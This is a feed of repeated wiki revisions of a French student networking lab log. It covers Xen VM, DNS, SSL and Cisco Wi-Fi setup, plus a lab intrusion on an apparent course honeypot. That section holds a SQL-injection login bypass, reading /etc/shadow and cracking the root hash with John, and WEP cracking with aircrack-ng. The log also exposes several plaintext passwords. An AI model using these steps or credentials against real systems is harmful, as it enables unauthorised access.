 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom du réseau sans fil: wlan0mon&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On scanne les réseaux :&lt;br /&gt;
 airodump-ng --encrypte wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep1.png|600px]]&lt;br /&gt;
&lt;br /&gt;
On lance avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -z testwep-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep2.png|600px]]&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54501</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54501"/>
				<updated>2020-12-14T14:19:55Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Sur la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
 www      IN      CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Puis ajouter dans newaliases&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Installation de mailx pour lire les mails reçus&lt;br /&gt;
 apt-install bsd-mailx&lt;br /&gt;
Pour consulter le mail de vérification&lt;br /&gt;
 mailx admin&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
verifications:&lt;br /&gt;
 host -t soa girolle.site ns6.gandi.net&lt;br /&gt;
 Sur Zabeth : host www.girolle.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation par certificat SSL ===&lt;br /&gt;
&lt;br /&gt;
Génération du CSR à l'aide d'openssl&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr&lt;br /&gt;
&lt;br /&gt;
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt&lt;br /&gt;
&lt;br /&gt;
Configuration du serveur apache2&lt;br /&gt;
&lt;br /&gt;
Activation du ssl sur apache2 &lt;br /&gt;
 ae2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                                                         &lt;br /&gt;
  ServerName www.girolle.site                                                                                             &lt;br /&gt;
  Redirect / https://www.girolle.site       &lt;br /&gt;
  ....                                                                        &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.182:443&amp;gt;&lt;br /&gt;
     DocumentRoot /var/www/html2&lt;br /&gt;
     ServerName girolle.site&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/girolle.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/girolle.site.key&lt;br /&gt;
         SSLCertificateChainFile /root/GandiCA.pem&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom du réseau sans fil: wlan0mon&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On scanne les réseaux :&lt;br /&gt;
 airodump-ng --encrypte wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep1.png|600px]]&lt;br /&gt;
&lt;br /&gt;
On lance avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -z testwep-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep2.png|600px]]&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54495</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54495"/>
				<updated>2020-12-14T14:08:57Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Sur la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
www      IN      CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Puis ajouter dans newaliases&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Installation de mailx pour lire les mails reçus&lt;br /&gt;
 apt-install bsd-mailx&lt;br /&gt;
Pour consulter le mail de vérification&lt;br /&gt;
 mailx admin&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
verifications:&lt;br /&gt;
 host -t soa girolle.site ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation par certificat SSL ===&lt;br /&gt;
&lt;br /&gt;
Génération du CSR à l'aide d'openssl&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr&lt;br /&gt;
&lt;br /&gt;
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt&lt;br /&gt;
&lt;br /&gt;
Configuration du serveur apache2&lt;br /&gt;
&lt;br /&gt;
Activation du ssl sur apache2 &lt;br /&gt;
 ae2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                                                         &lt;br /&gt;
  ServerName www.girolle.site                                                                                             &lt;br /&gt;
  Redirect / https://www.girolle.site       &lt;br /&gt;
  ....                                                                        &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.182:443&amp;gt;&lt;br /&gt;
     DocumentRoot /var/www/html2&lt;br /&gt;
     ServerName girolle.site&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/girolle.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/girolle.site.key&lt;br /&gt;
         SSLCertificateChainFile /root/GandiCA.pem&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
